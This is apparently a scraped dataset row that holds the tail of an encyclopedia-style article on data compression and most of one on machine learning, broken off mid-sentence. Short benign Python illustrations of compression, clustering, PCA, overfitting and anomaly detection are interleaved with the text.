Hitachi and Panasonic. 77 H.264 MPEG 4 AVC was developed in 2003 by a number of organizations, primarily Panasonic, Godo Kaisha IP Bridge and LG Electronics. 78 AVC commercially introduced the modern context-adaptive binary arithmetic coding (CABAC) and context-adaptive variable-length coding (CAVLC) algorithms. AVC is the main video encoding standard for Blu-ray Discs, and is widely used by video sharing websites and streaming internet services such as YouTube, Netflix, Vimeo, and iTunes Store, web software such as Adobe Flash Player and Microsoft Silverlight, and various HDTV broadcasts over terrestrial and satellite television. Genetics compression algorithms are the latest generation of lossless algorithms that compress data (typically sequences of nucleotides) using both conventional compression algorithms and genetic algorithms adapted to the specific datatype. In 2012, a team of scientists from Johns Hopkins University published a genetic compression algorithm that does not use a reference genome for compression. HAPZIPPER was tailored for HapMap data and achieves over 20 fold compression (95% reduction in file size), providing 2 to 4 fold better compression and is less computationally intensive than the leading general-purpose compression utilities. 
For this, Chanda, Elhaik, and Bader introduced MAF-based encoding (MAFE), which reduces the heterogeneity of the dataset by sorting SNPs by their minor allele frequency, thus homogenizing the dataset. 79 Other algorithms developed in 2009 and 2013 (DNAZip and GenomeZip) have compression ratios of up to 1200 fold—allowing 6 billion basepair diploid human genomes to be stored in 2.5 megabytes (relative to a reference genome or averaged over many genomes). 80 81 For a benchmark in genetics genomics data compressors, see 82 It is estimated that the total amount of data that is stored on the world's storage devices could be further compressed with existing compression algorithms by a remaining average factor of 4.5:1. 83 It is estimated that the combined technological capacity of the world to store information provides 1,300 exabytes of hardware digits in 2007, but when the corresponding content is optimally compressed, this only represents 295 exabytes of Shannon information. 84 |
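A minimal sketch of the reference-based idea behind tools like DNAZip and GenomeZip mentioned above: instead of storing a genome outright, store only the positions where it differs from a reference sequence. The sequences and helper functions here are invented purely for illustration.

def diff_against_reference(reference, genome):
    # Keep only (position, base) pairs where the genome differs from the reference
    return [(i, b) for i, (a, b) in enumerate(zip(reference, genome)) if a != b]

def reconstruct(reference, variants):
    seq = list(reference)
    for pos, base in variants:
        seq[pos] = base
    return "".join(seq)

reference = "ACGT" * 250                                   # toy 1,000-base reference
genome = list(reference)
genome[10], genome[500], genome[999] = "T", "C", "C"       # three single-base variants
genome = "".join(genome)

variants = diff_against_reference(reference, genome)
print(len(variants), "variants stored instead of", len(genome), "bases")
assert reconstruct(reference, variants) == genome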
226 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Machine_learning | Machine learning (ML) is a field of study in artificial intelligence concerned with the development and study of statistical algorithms that can learn from data and generalize to unseen data and thus perform tasks without explicit instructions. 1 Recently, artificial neural networks have been able to surpass many previous approaches in performance. 2 ML finds application in many fields, including natural language processing, computer vision, speech recognition, email filtering, agriculture, and medicine. 3 4 When applied to business problems, it is known under the name predictive analytics. Although not all machine learning is statistically based, computational statistics is an important source of the field's methods. The mathematical foundations of ML are provided by mathematical optimization (mathematical programming) methods. Data mining is a related (parallel) field of study, focusing on exploratory data analysis (EDA) through unsupervised learning. 6 7 From a theoretical viewpoint, probably approximately correct (PAC) learning provides a framework for describing machine learning. The term machine learning was coined in 1959 by Arthur Samuel, an IBM employee and pioneer in the field of computer gaming and artificial intelligence. 8 9 The synonym self-teaching computers was also used in this time period. 10 11 Although the earliest machine learning model was introduced in the 1950s when Arthur Samuel invented a program that calculated the winning chance in checkers for each side, the history of machine learning roots back to decades of human desire and effort to study human cognitive processes. 12 In 1949, Canadian psychologist Donald Hebb published the book The Organization of Behavior, in which he introduced a theoretical neural structure formed by certain interactions among nerve cells. 13 Hebb's model of neurons interacting with one another set a groundwork for how AIs and machine learning algorithms work under nodes, or artificial neurons used by computers to communicate data. 12 Other researchers who have studied human cognitive systems contributed to the modern machine learning technologies as well, including logician Walter Pitts and Warren McCulloch, who proposed the early mathematical models of neural networks to come up with algorithms that mirror human thought processes. 12 By the early 1960s an experimental "learning machine" with punched tape memory, called Cybertron, had been developed by Raytheon Company to analyze sonar signals, electrocardiograms, and speech patterns using rudimentary reinforcement learning. It was repetitively "trained" by a human operator teacher to recognize patterns and equipped with a "goof" button to cause it to reevaluate incorrect decisions. 14 A representative book on research into machine learning during the 1960s was Nilsson's book on Learning Machines, dealing mostly with machine learning for pattern classification. 15 Interest related to pattern recognition continued into the 1970s, as described by Duda and Hart in 1973. 16 In 1981 a report was given on using teaching strategies so that an artificial neural network learns to recognize 40 characters (26 letters, 10 digits, and 4 special symbols) from a computer terminal. 17 Tom M. 
Mitchell provided a widely quoted, more formal definition of the algorithms studied in the machine learning field: "A computer program is said to learn from experience E with respect to some class of tasks T and performance measure P if its performance at tasks in T, as measured by P, improves with experience E. 18 This definition of the tasks in which machine learning is concerned offers a fundamentally operational definition rather than defining the field in cognitive terms. This follows Alan Turing's proposal in his paper "Computing Machinery and Intelligence", in which the question "Can machines think? is replaced with the question "Can machines do what we (as thinking entities) can do? . 19 Modern-day machine learning has two objectives. One is to classify data based on models which have been developed; the other purpose is to make predictions for future outcomes based on these models. A hypothetical algorithm specific to classifying data may use computer vision of moles coupled with supervised learning in order to train it to classify the cancerous moles. A machine learning algorithm for stock trading may inform the trader of future potential predictions. 20 As a scientific endeavor, machine learning grew out of the quest for artificial intelligence (AI). In the early days of AI as an academic discipline, some researchers were interested in having machines learn from data. They attempted to approach the problem with various symbolic methods, as well as what were then termed "neural networks"; these were mostly perceptrons and other models that were later found to be reinventions of the generalized linear models of statistics. 22 Probabilistic reasoning was also employed, especially in automated medical diagnosis. 23 : 488 However, an increasing emphasis on the logical, knowledge-based approach caused a rift between AI and machine learning. Probabilistic systems were plagued by theoretical and practical problems of data acquisition and representation. 23 : 488 By 1980, expert systems had come to dominate AI, and statistics was out of favor. 24 Work on symbolic knowledge-based learning did continue within AI, leading to inductive logic programming(ILP), but the more statistical line of research was now outside the field of AI proper, in pattern recognition and information retrieval. 23 : 708 710, 755 Neural networks research had been abandoned by AI and computer science around the same time. This line, too, was continued outside the AI CS field, as "connectionism", by researchers from other disciplines including Hopfield, Rumelhart, and Hinton. Their main success came in the mid 1980s with the reinvention of backpropagation. 23 : 25 Machine learning (ML), reorganized and recognized as its own field, started to flourish in the 1990s. The field changed its goal from achieving artificial intelligence to tackling solvable problems of a practical nature. It shifted focus away from the symbolic approaches it had inherited from AI, and toward methods and models borrowed from statistics, fuzzy logic, and probability theory. 24 There is a close connection between machine learning and compression. A system that predicts the posterior probabilities of a sequence given its entire history can be used for optimal data compression (by using arithmetic coding on the output distribution). Conversely, an optimal compressor can be used for prediction (by finding the symbol that compresses best, given the previous history). 
This equivalence has been used as a justification for using data compression as a benchmark for "general intelligence". 25 26 27 An alternative view can show compression algorithms implicitly map strings into implicit feature space vectors, and compression-based similarity measures compute similarity within these feature spaces. For each compressor C(.) we define an associated vector space , such that C(.) maps an input string x, corresponding to the vector norm x . An exhaustive examination of the feature spaces underlying all compression algorithms is precluded by space; instead, feature vectors chooses to examine three representative lossless compression methods, LZW, LZ77, and PPM. 28 According to AIXI theory, a connection more directly explained in Hutter Prize, the best possible compression of x is the smallest possible software that generates x. For example, in that model, a zip file's compressed size includes both the zip file and the unzipping software, since you can not unzip it without both, but there may be an even smaller combined form. Examples of AI-powered audio video compression software include NVIDIA Maxine, AIVC. 29 Examples of software that can perform AI-powered image compression include OpenCV, TensorFlow, MATLAB's Image Processing Toolbox (IPT) and High-Fidelity Generative Image Compression. 30 In unsupervised machine learning, k-means clustering can be utilized to compress data by grouping similar data points into clusters. This technique simplifies handling extensive datasets that lack predefined labels and finds widespread use in fields such as image compression. 31 Data compression aims to reduce the size of data files, enhancing storage efficiency and speeding up data transmission. K-means clustering, an unsupervised machine learning algorithm, is employed to partition a dataset into a specified number of clusters, k, each represented by the centroid of its points. This process condenses extensive datasets into a more compact set of representative points. Particularly beneficial in image and signal processing, k-means clustering aids in data reduction by replacing groups of data points with their centroids, thereby preserving the core information of the original data while significantly decreasing the required storage space. 32 Machine learning and data mining often employ the same methods and overlap significantly, but while machine learning focuses on prediction, based on known properties learned from the training data, data mining focuses on the discovery of (previously) unknown properties in the data (this is the analysis step of knowledge discovery in databases). Data mining uses many machine learning methods, but with different goals; on the other hand, machine learning also employs data mining methods as "unsupervised learning" or as a preprocessing step to improve learner accuracy. Much of the confusion between these two research communities (which do often have separate conferences and separate journals, ECML PKDD being a major exception) comes from the basic assumptions they work with: in machine learning, performance is usually evaluated with respect to the ability to reproduce known knowledge, while in knowledge discovery and data mining (KDD) the key task is the discovery of previously unknown knowledge. Evaluated with respect to known knowledge, an uninformed (unsupervised) method will easily be outperformed by other supervised methods, while in a typical KDD task, supervised methods cannot be used due to the unavailability of training data. 
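The compression-based similarity idea mentioned above can be sketched with an off-the-shelf compressor. The snippet below uses zlib (a DEFLATE implementation) to approximate the normalized compression distance between strings; zlib is only standing in for the compressors discussed in the text, and the example strings are arbitrary.

import zlib

def c(data: bytes) -> int:
    # Compressed length, used as a stand-in for the compressor C(.)
    return len(zlib.compress(data, 9))

def ncd(x: bytes, y: bytes) -> float:
    # Normalized compression distance: strings that share structure compress well together
    return (c(x + y) - min(c(x), c(y))) / max(c(x), c(y))

a = b"the quick brown fox jumps over the lazy dog " * 20
b = b"the quick brown fox jumps over the lazy cat " * 20
unrelated = b"numbers: 0123456789 " * 20
print(round(ncd(a, b), 3))          # small: a and b are near-duplicates
print(round(ncd(a, unrelated), 3))  # larger: little shared structure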
Machine learning also has intimate ties to optimization: Many learning problems are formulated as minimization of some loss function on a training set of examples. Loss functions express the discrepancy between the predictions of the model being trained and the actual problem instances (for example, in classification, one wants to assign a label to instances, and models are trained to correctly predict the preassigned labels of a set of examples). 34 The difference between optimization and machine learning arises from the goal of generalization: While optimization algorithms can minimize the loss on a training set, machine learning is concerned with minimizing the loss on unseen samples. Characterizing the generalization of various learning algorithms is an active topic of current research, especially for deep learning algorithms. Machine learning and statistics are closely related fields in terms of methods, but distinct in their principal goal: statistics draws population inferences from a sample, while machine learning finds generalizable predictive patterns. 35 According to Michael I. Jordan, the ideas of machine learning, from methodological principles to theoretical tools, have had a long pre-history in statistics. 36 He also suggested the term data science as a placeholder to call the overall field. 36 Conventional statistical analyses require the a priori selection of a model most suitable for the study data set. In addition, only significant or theoretically relevant variables based on previous experience are included for analysis. In contrast, machine learning is not built on a pre-structured model; rather, the data shape the model by detecting underlying patterns. The more variables (input) used to train the model, the more accurate the ultimate model will be. 37 Leo Breiman distinguished two statistical modeling paradigms: data model and algorithmic model, 38 wherein "algorithmic model" means more or less the machine learning algorithms like Random Forest. Some statisticians have adopted methods from machine learning, leading to a combined field that they call statistical learning. 39 Analytical and computational techniques derived from deep-rooted physics of disordered systems can be extended to large-scale problems, including machine learning, e.g., to analyze the weight space of deep neural networks. 40 Statistical physics is thus finding applications in the area of medical diagnostics. 41 A core objective of a learner is to generalize from its experience. 5 42 Generalization in this context is the ability of a learning machine to perform accurately on new, unseen examples tasks after having experienced a learning data set. The training examples come from some generally unknown probability distribution (considered representative of the space of occurrences) and the learner has to build a general model about this space that enables it to produce sufficiently accurate predictions in new cases. The computational analysis of machine learning algorithms and their performance is a branch of theoretical computer science known as computational learning theory via the Probably Approximately Correct Learning (PAC) model. Because training sets are finite and the future is uncertain, learning theory usually does not yield guarantees of the performance of algorithms. Instead, probabilistic bounds on the performance are quite common. The bias variance decomposition is one way to quantify generalization error. 
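The distinction drawn above between minimizing loss on the training set and generalizing to unseen samples can be seen in a few lines of NumPy: fit polynomials of increasing degree to noisy samples of a cubic and compare the mean squared error on the training points with the error on freshly drawn points. The target function, noise level, and degrees are arbitrary choices for illustration.

import numpy as np

rng = np.random.default_rng(3)
true_f = lambda x: x**3 - 2 * x                      # the unknown function being learned

x_train = rng.uniform(-2, 2, 20)
y_train = true_f(x_train) + rng.normal(0, 1.0, x_train.size)
x_new = rng.uniform(-2, 2, 500)                      # "unseen" samples
y_new = true_f(x_new) + rng.normal(0, 1.0, x_new.size)

for degree in (1, 3, 12):
    coef = np.polyfit(x_train, y_train, degree)
    train_mse = np.mean((np.polyval(coef, x_train) - y_train) ** 2)
    new_mse = np.mean((np.polyval(coef, x_new) - y_new) ** 2)
    # degree 1 underfits, degree 3 roughly matches the target, and degree 12
    # drives training error down while error on unseen data typically rises
    print(degree, round(train_mse, 2), round(new_mse, 2))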
For the best performance in the context of generalization, the complexity of the hypothesis should match the complexity of the function underlying the data. If the hypothesis is less complex than the function, then the model has under fitted the data. If the complexity of the model is increased in response, then the training error decreases. But if the hypothesis is too complex, then the model is subject to overfitting and generalization will be poorer. 43 In addition to performance bounds, learning theorists study the time complexity and feasibility of learning. In computational learning theory, a computation is considered feasible if it can be done in polynomial time. There are two kinds of time complexity results: Positive results show that a certain class of functions can be learned in polynomial time. Negative results show that certain classes cannot be learned in polynomial time. Machine learning approaches are traditionally divided into three broad categories, which correspond to learning paradigms, depending on the nature of the "signal" or "feedback" available to the learning system: Although each algorithm has advantages and limitations, no single algorithm works for all problems. 44 45 46 Supervised learning algorithms build a mathematical model of a set of data that contains both the inputs and the desired outputs. 47 The data, known as training data, consists of a set of training examples. Each training example has one or more inputs and the desired output, also known as a supervisory signal. In the mathematical model, each training example is represented by an array or vector, sometimes called a feature vector, and the training data is represented by a matrix. Through iterative optimization of an objective function, supervised learning algorithms learn a function that can be used to predict the output associated with new inputs. 48 An optimal function allows the algorithm to correctly determine the output for inputs that were not a part of the training data. An algorithm that improves the accuracy of its outputs or predictions over time is said to have learned to perform that task. 18 Types of supervised-learning algorithms include active learning, classification and regression. 49 Classification algorithms are used when the outputs are restricted to a limited set of values, and regression algorithms are used when the outputs may have any numerical value within a range. As an example, for a classification algorithm that filters emails, the input would be an incoming email, and the output would be the name of the folder in which to file the email. Examples of regression would be predicting the height of a person, or the future temperature. 50 Similarity learning is an area of supervised machine learning closely related to regression and classification, but the goal is to learn from examples using a similarity function that measures how similar or related two objects are. It has applications in ranking, recommendation systems, visual identity tracking, face verification, and speaker verification. Unsupervised learning algorithms find structures in data that has not been labeled, classified or categorized. Instead of responding to feedback, unsupervised learning algorithms identify commonalities in the data and react based on the presence or absence of such commonalities in each new piece of data. Central applications of unsupervised machine learning include clustering, dimensionality reduction, 7 and density estimation. 
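A small scikit-learn sketch of the clustering idea just mentioned, reusing the k-means compression example from earlier in the text: pixels of a synthetic image are grouped into k clusters and each pixel is replaced by its cluster centroid, so only the k centroids plus one small label per pixel need to be kept. scikit-learn and the synthetic image are assumptions of this sketch; any k-means implementation would do.

import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(2)
base_colors = rng.integers(0, 256, size=(5, 3)).astype(float)
img = base_colors[rng.integers(0, 5, size=(64, 64))]       # synthetic 64x64 RGB image
img += rng.normal(0, 8, img.shape)                          # mild per-pixel noise

pixels = img.reshape(-1, 3)
km = KMeans(n_clusters=5, n_init=10, random_state=0).fit(pixels)
quantized = km.cluster_centers_[km.labels_].reshape(img.shape)   # each pixel -> its centroid

# Stored data: 5 centroids of 3 values each, plus one label (0-4) per pixel,
# instead of three full color channels per pixel.
print("mean absolute error per channel:", round(np.abs(quantized - img).mean(), 2))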
51 Unsupervised learning algorithms also streamlined the process of identifying large indel based haplotypes of a gene of interest from pan-genome. 52 Cluster analysis is the assignment of a set of observations into subsets (called clusters) so that observations within the same cluster are similar according to one or more predesignated criteria, while observations drawn from different clusters are dissimilar. Different clustering techniques make different assumptions on the structure of the data, often defined by some similarity metric and evaluated, for example, by internal compactness, or the similarity between members of the same cluster, and separation, the difference between clusters. Other methods are based on estimated density and graph connectivity. A special type of unsupervised learning called, self-supervised learning involves training a model by generating the supervisory signal from the data itself. 54 55 Semi-supervised learning falls between unsupervised learning (without any labeled training data) and supervised learning (with completely labeled training data). Some of the training examples are missing training labels, yet many machine-learning researchers have found that unlabeled data, when used in conjunction with a small amount of labeled data, can produce a considerable improvement in learning accuracy. In weakly supervised learning, the training labels are noisy, limited, or imprecise; however, these labels are often cheaper to obtain, resulting in larger effective training sets. 56 Reinforcement learning is an area of machine learning concerned with how software agents ought to take actions in an environment so as to maximize some notion of cumulative reward. Due to its generality, the field is studied in many other disciplines, such as game theory, control theory, operations research, information theory, simulation-based optimization, multi-agent systems, swarm intelligence, statistics and genetic algorithms. In reinforcement learning, the environment is typically represented as a Markov decision process (MDP). Many reinforcements learning algorithms use dynamic programming techniques. 57 Reinforcement learning algorithms do not assume knowledge of an exact mathematical model of the MDP and are used when exact models are infeasible. Reinforcement learning algorithms are used in autonomous vehicles or in learning to play a game against a human opponent. Dimensionality reduction is a process of reducing the number of random variables under consideration by obtaining a set of principal variables. 58 In other words, it is a process of reducing the dimension of the feature set, also called the "number of features". Most of the dimensionality reduction techniques can be considered as either feature elimination or extraction. One of the popular methods of dimensionality reduction is principal component analysis (PCA). PCA involves changing higher-dimensional data (e.g., 3D) to a smaller space (e.g., 2D). The manifold hypothesis proposes that high-dimensional data sets lie along low-dimensional manifolds, and many dimensionality reduction techniques make this assumption, leading to the area of manifold learning and manifold regularization. Other approaches have been developed which do not fit neatly into this three-fold categorization, and sometimes more than one is used by the same machine learning system. For example, topic modeling, meta-learning. 
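A minimal NumPy sketch of the PCA example above (projecting 3-D points onto a 2-D subspace) using the singular value decomposition of the centered data; the synthetic data and the choice of two components are assumptions made for illustration.

import numpy as np

rng = np.random.default_rng(4)
latent = rng.normal(size=(200, 2))                       # hidden 2-D structure
mix = np.array([[1.0, 0.0], [0.5, 1.0], [0.2, -0.3]])    # embeds it in 3-D
X = latent @ mix.T + rng.normal(scale=0.05, size=(200, 3))

Xc = X - X.mean(axis=0)                                  # center the data
U, S, Vt = np.linalg.svd(Xc, full_matrices=False)
X_2d = Xc @ Vt[:2].T                                     # coordinates in the top-2 component plane
retained = (S[:2] ** 2).sum() / (S ** 2).sum()
print("fraction of variance kept by 2 components:", round(retained, 4))   # close to 1.0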
59 Self-learning, as a machine learning paradigm, was introduced in 1982 along with a neural network capable of self-learning, named crossbar adaptive array (CAA). 60 It is learning with no external rewards and no external teacher advice. The CAA self-learning algorithm computes, in a crossbar fashion, both decisions about actions and emotions (feelings) about consequence situations. The system is driven by the interaction between cognition and emotion. 61 The self-learning algorithm maintains a memory matrix W = ||w(a,s)||, which it updates in each iteration of its learning routine. It is a system with only one input, the situation s, and only one output, the action (or behavior) a. There is neither a separate reinforcement input nor an advice input from the environment. The backpropagated value (secondary reinforcement) is the emotion toward the consequence situation. The CAA exists in two environments: one is the behavioral environment where it behaves, and the other is the genetic environment, from which it initially, and only once, receives initial emotions about situations to be encountered in the behavioral environment. After receiving the genome (species) vector from the genetic environment, the CAA learns a goal-seeking behavior in an environment that contains both desirable and undesirable situations. 62 Several learning algorithms aim at discovering better representations of the inputs provided during training. 63 Classic examples include principal component analysis and cluster analysis. Feature learning algorithms, also called representation learning algorithms, often attempt to preserve the information in their input but also transform it in a way that makes it useful, often as a pre-processing step before performing classification or predictions. This technique allows reconstruction of the inputs coming from the unknown data-generating distribution, while not being necessarily faithful to configurations that are implausible under that distribution. This replaces manual feature engineering, and allows a machine to both learn the features and use them to perform a specific task. Feature learning can be either supervised or unsupervised. In supervised feature learning, features are learned using labeled input data. Examples include artificial neural networks, multilayer perceptrons, and supervised dictionary learning. In unsupervised feature learning, features are learned with unlabeled input data. Examples include dictionary learning, independent component analysis, autoencoders, matrix factorization 64 and various forms of clustering. 65 66 67 Manifold learning algorithms attempt to do so under the constraint that the learned representation is low-dimensional. Sparse coding algorithms attempt to do so under the constraint that the learned representation is sparse, meaning that the mathematical model has many zeros. Multilinear subspace learning algorithms aim to learn low-dimensional representations directly from tensor representations for multidimensional data, without reshaping them into higher-dimensional vectors. 68 Deep learning algorithms discover multiple levels of representation, or a hierarchy of features, with higher-level, more abstract features defined in terms of (or generating) lower-level features. It has been argued that an intelligent machine is one that learns a representation that disentangles the underlying factors of variation that explain the observed data.
69 Feature learning is motivated by the fact that machine learning tasks such as classification often require input that is mathematically and computationally convenient to process. However, real-world data such as images, video, and sensory data has not yielded attempts to algorithmically define specific features. An alternative is to discover such features or representations through examination, without relying on explicit algorithms. Sparse dictionary learning is a feature learning method where a training example is represented as a linear combination of basis functions and assumed to be a sparse matrix. The method is strongly NP-hard and difficult to solve approximately. 70 A popular heuristic method for sparse dictionary learning is the k-SVD algorithm. Sparse dictionary learning has been applied in several contexts. In classification, the problem is to determine the class to which a previously unseen training example belongs. For a dictionary where each class has already been built, a new training example is associated with the class that is best sparsely represented by the corresponding dictionary. Sparse dictionary learning has also been applied in image de-noising. The key idea is that a clean image patch can be sparsely represented by an image dictionary, but the noise cannot. 71 In data mining, anomaly detection, also known as outlier detection, is the identification of rare items, events or observations which raise suspicions by differing significantly from the majority of the data. 72 Typically, the anomalous items represent an issue such as bank fraud, a structural defect, medical problems or errors in a text. Anomalies are referred to as outliers, novelties, noise, deviations and exceptions. 73 In particular, in the context of abuse and network intrusion detection, the interesting objects are often not rare objects, but unexpected bursts of inactivity. This pattern does not adhere to the common statistical definition of an outlier as a rare object. Many outlier detection methods (in particular, unsupervised algorithms) will fail on such data unless aggregated appropriately. Instead, a cluster analysis algorithm may be able to detect the micro-clusters formed by these patterns. 74 Three broad categories of anomaly detection techniques exist. 75 Unsupervised anomaly detection techniques detect anomalies in an unlabeled test data set under the assumption that the majority of the instances in the data set are normal, by looking for instances that seem to fit the least to the remainder of the data set. Supervised anomaly detection techniques require a data set that has been labeled as "normal" and "abnormal" and involves training a classifier (the key difference from many other statistical classification problems is the inherently unbalanced nature of outlier detection). Semi-supervised anomaly detection techniques construct a model representing normal behavior from a given normal training data set and then test the likelihood of a test instance to be generated by the model. Robot learning is inspired by a multitude of machine learning methods, starting from supervised learning, reinforcement learning, 76 77 and finally meta-learning (e.g. MAML). Association rule learning is a rule-based machine learning method for discovering relationships between variables in large databases. It is intended to identify strong rules discovered in databases using some measure of "interestingness". 
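A toy sketch of the unsupervised anomaly-detection setting described above: with no labels, points are flagged simply because they sit far from the bulk of the data (here, by z-score on the distance from the mean). Real systems use much richer models; the data and the threshold of 3 are arbitrary illustrative choices.

import numpy as np

rng = np.random.default_rng(5)
normal_points = rng.normal(loc=0.0, scale=1.0, size=(500, 2))   # the unlabeled bulk
outliers = np.array([[7.0, 8.0], [-6.0, 9.0]])                  # a few rare, distant events
data = np.vstack([normal_points, outliers])

center = data.mean(axis=0)
dists = np.linalg.norm(data - center, axis=1)
z = (dists - dists.mean()) / dists.std()
flagged = np.where(z > 3)[0]                 # indices that look anomalous
print("flagged indices:", flagged)           # should include the injected outliers (500, 501)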
78 Rule-based machine learning is a general term for any machine learning method that identifies, learns, or evolves "rules" to store, manipulate or apply knowledge. The defining characteristic of a rule-based machine learning algorithm is the identification and utilization of a set of relational rules that collectively represent the knowledge captured by the system. This is in contrast to other machine learning algorithms that commonly identify a singular model that can be universally applied to any instance in order to make a prediction. 79 Rule-based machine learning approaches include learning classifier systems, association rule learning, and artificial immune systems. Based on the concept of strong rules, Rakesh Agrawal, Tomasz Imieliński and Arun Swami introduced association rules for discovering regularities between products in large-scale transaction data recorded by point-of-sale (POS) systems in supermarkets. 80 For example, the rule {onions, potatoes} ⇒ {burger} found in the sales data of a supermarket would indicate that if a customer buys onions and potatoes together, they are likely to also buy hamburger meat (a small worked example of how such a rule is scored follows this passage). Such information can be used as the basis for decisions about marketing activities such as promotional pricing or product placements. In addition to market basket analysis, association rules are employed today in application areas including Web usage mining, intrusion detection, continuous production, and bioinformatics. In contrast with sequence mining, association rule learning typically does not consider the order of items either within a transaction or across transactions. Learning classifier systems (LCS) are a family of rule-based machine learning algorithms that combine a discovery component, typically a genetic algorithm, with a learning component, performing either supervised learning, reinforcement learning, or unsupervised learning. They seek to identify a set of context-dependent rules that collectively store and apply knowledge in a piecewise manner in order to make predictions. 81 Inductive logic programming (ILP) is an approach to rule learning using logic programming as a uniform representation for input examples, background knowledge, and hypotheses. Given an encoding of the known background knowledge and a set of examples represented as a logical database of facts, an ILP system will derive a hypothesized logic program that entails all positive and no negative examples. Inductive programming is a related field that considers any kind of programming language for representing hypotheses (and not only logic programming), such as functional programs. Inductive logic programming is particularly useful in bioinformatics and natural language processing. Gordon Plotkin and Ehud Shapiro laid the initial theoretical foundation for inductive machine learning in a logical setting. 82 83 84 Shapiro built their first implementation (Model Inference System) in 1981: a Prolog program that inductively inferred logic programs from positive and negative examples. 85 The term inductive here refers to philosophical induction, suggesting a theory to explain observed facts, rather than mathematical induction, proving a property for all members of a well-ordered set. A machine learning model is a type of mathematical model that, after being "trained" on a given dataset, can be used to make predictions or classifications on new data.
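As promised above, here is a small worked example of how an association rule such as {onions, potatoes} ⇒ {burger} is scored. Support and confidence are the standard measures; the transaction list is invented for illustration.

transactions = [
    {"onions", "potatoes", "burger"},
    {"onions", "potatoes", "burger", "beer"},
    {"onions", "potatoes"},
    {"milk", "bread"},
    {"potatoes", "burger"},
]

def support(itemset):
    # Fraction of transactions containing every item in the itemset
    return sum(itemset <= t for t in transactions) / len(transactions)

antecedent = {"onions", "potatoes"}
consequent = {"burger"}
rule_support = support(antecedent | consequent)      # 2 of 5 transactions -> 0.4
confidence = rule_support / support(antecedent)      # 0.4 / 0.6 -> about 0.67
print("support:", rule_support, "confidence:", round(confidence, 2))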
During training, a learning algorithm iteratively adjusts the model's internal parameters to minimize errors in its predictions. 86 By extension, the term "model" can refer to several levels of specificity, from a general class of models and their associated learning algorithms to a fully trained model with all its internal parameters tuned. 87 Various types of models have been used and researched for machine learning systems, picking the best model for a task is called model selection. Artificial neural networks (ANNs), or connectionist systems, are computing systems vaguely inspired by the biological neural networks that constitute animal brains. Such systems "learn" to perform tasks by considering examples, generally without being programmed with any task-specific rules. An ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition. 88 Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels, and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. 
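The artificial neuron described above (a weighted sum of incoming signals passed through a non-linear function) fits in a few lines of NumPy. The weights, bias, and choice of a sigmoid non-linearity are arbitrary illustrative values, not part of any particular network.

import numpy as np

def neuron(inputs, weights, bias):
    # Weighted sum of the incoming signals, passed through a non-linear activation
    z = np.dot(weights, inputs) + bias
    return 1.0 / (1.0 + np.exp(-z))          # sigmoid squashes the sum into (0, 1)

x = np.array([0.5, -1.2, 3.0])               # signals arriving on three incoming edges
w = np.array([0.8, 0.1, -0.4])               # per-edge weights, adjusted as learning proceeds
print(neuron(x, w, bias=0.2))                # this neuron's outgoing signal

# A "layer" is just many such neurons sharing the same inputs:
W = np.array([[0.8, 0.1, -0.4],
              [-0.3, 0.7, 0.2]])             # two neurons, three inputs each
print(1.0 / (1.0 + np.exp(-(W @ x + np.array([0.2, -0.1])))))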
In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision-making. Support-vector machines (SVMs), also known as support-vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category. 89 An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel 90 ), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. A Gaussian process is a stochastic process in which every finite collection of the random variables in the process has a multivariate normal distribution, and it relies on a pre-defined covariance function, or kernel, that models how pairs of points relate to each other depending on their locations. Given a set of observed points, or input output examples, the distribution of the (unobserved) output of a new point as function of its input data can be directly computed by looking like the observed points and the covariances between those points and the new, unobserved point. Gaussian processes are popular surrogate models in Bayesian optimization used to do hyperparameter optimization. A genetic algorithm (GA) is a search algorithm and heuristic technique that 